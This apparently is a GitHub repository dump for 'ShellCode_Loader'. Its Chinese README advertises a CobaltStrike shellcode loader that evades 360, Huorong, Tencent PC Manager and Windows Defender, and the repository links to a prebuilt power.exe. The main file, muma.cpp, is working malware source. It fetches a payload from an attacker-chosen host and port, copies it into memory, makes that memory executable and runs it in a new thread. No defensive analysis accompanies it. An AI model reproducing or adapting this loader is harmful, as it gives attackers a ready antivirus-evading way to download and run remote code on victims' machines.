├── README.md
├── muma.cpp
└── power.exe


/README.md:
--------------------------------------------------------------------------------
1 | ShellCode_Loader - CobaltStrike免杀ShellCode加载器 - 免杀Shellcode加密生成工具，目前测试免杀360&火绒&电脑管家&Windows Defender，请参考博客 https://www.vpss.cc/471.html
2 | 


--------------------------------------------------------------------------------
/muma.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <stdio.h>
  3 | #include <winsock2.h>
  4 | #include <ws2tcpip.h>
  5 | 
  6 | #pragma comment (lib, "Ws2_32.lib")
  7 | #pragma comment (lib, "Mswsock.lib")
  8 | #pragma comment (lib, "AdvApi32.lib")
  9 | 
 10 | #define DEFAULT_BUFLEN 4096
 11 | 
 12 | void power(char* host, char* port, char* resource) {
 13 | 
 14 |     DWORD oldp = 0;
 15 |     BOOL returnValue;
 16 | 
 17 |     size_t origsize = strlen(host) + 1;
 18 |     const size_t newsize = 100;
 19 |     size_t convertedChars = 0;
 20 |     wchar_t Whost[newsize];
 21 |     mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE);
 22 | 
 23 | 
 24 |     WSADATA wsaData;
 25 |     SOCKET ConnectSocket = INVALID_SOCKET;
 26 |     struct addrinfo* result = NULL,
 27 |         * ptr = NULL,
 28 |         hints;
 29 |     char sendbuf[MAX_PATH] = "";
 30 |     lstrcatA(sendbuf, "GET /");
 31 |     lstrcatA(sendbuf, resource);
 32 | 
 33 |     char recvbuf[DEFAULT_BUFLEN];
 34 |     memset(recvbuf, 0, DEFAULT_BUFLEN);
 35 |     int iResult;
 36 |     int recvbuflen = DEFAULT_BUFLEN;
 37 | 
 38 |     
 39 |     iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
 40 |     if (iResult != 0) {
 41 |         return ;
 42 |     }
 43 | 
 44 |     ZeroMemory(&hints, sizeof(hints));
 45 |     hints.ai_family = PF_INET;
 46 |     hints.ai_socktype = SOCK_STREAM;
 47 |     hints.ai_protocol = IPPROTO_TCP;
 48 | 
 49 |     iResult = getaddrinfo(host, port, &hints, &result);
 50 |     if (iResult != 0) {
 51 |         WSACleanup();
 52 |         return ;
 53 |     }
 54 | 
 55 | 
 56 |     for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {
 57 | 
 58 |         ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
 59 |             ptr->ai_protocol);
 60 |         if (ConnectSocket == INVALID_SOCKET) {
 61 |             WSACleanup();
 62 |             return ;
 63 |         }
 64 | 
 65 | 
 66 |         iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
 67 |         if (iResult == SOCKET_ERROR) {
 68 |             closesocket(ConnectSocket);
 69 |             ConnectSocket = INVALID_SOCKET;
 70 |             continue;
 71 |         }
 72 |         break;
 73 |     }
 74 | 
 75 |     freeaddrinfo(result);
 76 | 
 77 |     if (ConnectSocket == INVALID_SOCKET) {
 78 |         printf("Unable to connect to server!\n");
 79 |         WSACleanup();
 80 |         return ;
 81 |     }
 82 | 
 83 |     iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0);
 84 |     if (iResult == SOCKET_ERROR) {
 85 |         closesocket(ConnectSocket);
 86 |         WSACleanup();
 87 |         return ;
 88 |     }
 89 | 
 90 |     
 91 |     iResult = shutdown(ConnectSocket, SD_SEND);
 92 |     if (iResult == SOCKET_ERROR) {
 93 |         closesocket(ConnectSocket);
 94 |         WSACleanup();
 95 |         return ;
 96 |     }
 97 |     
 98 | 
 99 |     do {
100 | 
101 |         iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0);
102 |         if (iResult > 0)
103 |             printf("[+] Received %d Bytes\n", iResult);
104 |         else if (iResult == 0)
105 |             printf("[+] Connection closed\n");
106 |         else
107 |             printf("recv failed with error: %d\n", WSAGetLastError());
108 | 
109 | 
110 |         LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(recvbuf), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
111 | 
112 | 	if (!alloc_mem) {
113 | 		printf("Failed to Allocate memory (%u)\n", GetLastError());
114 | 		return -1;
115 | 	}
116 | 	
117 | 	MoveMemory(alloc_mem, recvbuf, sizeof(recvbuf));
118 | 
119 | 	DWORD oldProtect;
120 | 
121 | 	if (!VirtualProtect(alloc_mem, sizeof(recvbuf), PAGE_EXECUTE_READ, &oldProtect)) {
122 | 		printf("Fai1led to change memory protection (%u)\n", GetLastError());
123 | 		return -2;
124 | 	}
125 | 
126 | 
127 | 	HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
128 | 	if (!tHandle) {
129 | 		printf("Failed to Create the thread (%u)\n", GetLastError());
130 | 		return -3;
131 | 	}
132 | 
133 | 	printf("\n\nalloc_mem : %p\n", alloc_mem);
134 | 	WaitForSingleObject(tHandle, INFINITE);
135 | 
136 | 	return 0;
137 | 
138 |     } while (iResult > 0);
139 | 
140 |     closesocket(ConnectSocket);
141 |     WSACleanup();
142 | }
143 | 
144 | int main(int argc, char** argv) {
145 | 
146 |     if (argc != 4) {
147 |         printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]);
148 |         return 1;
149 |     }
150 | 
151 |     power(argv[1], argv[2], argv[3]);
152 | 
153 |     return 0;
154 | 
155 | }


--------------------------------------------------------------------------------
/power.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xjsafe/ShellCode_Loader/c1e685c766e0b2bf82afe40e55bdec0851305c38/power.exe


--------------------------------------------------------------------------------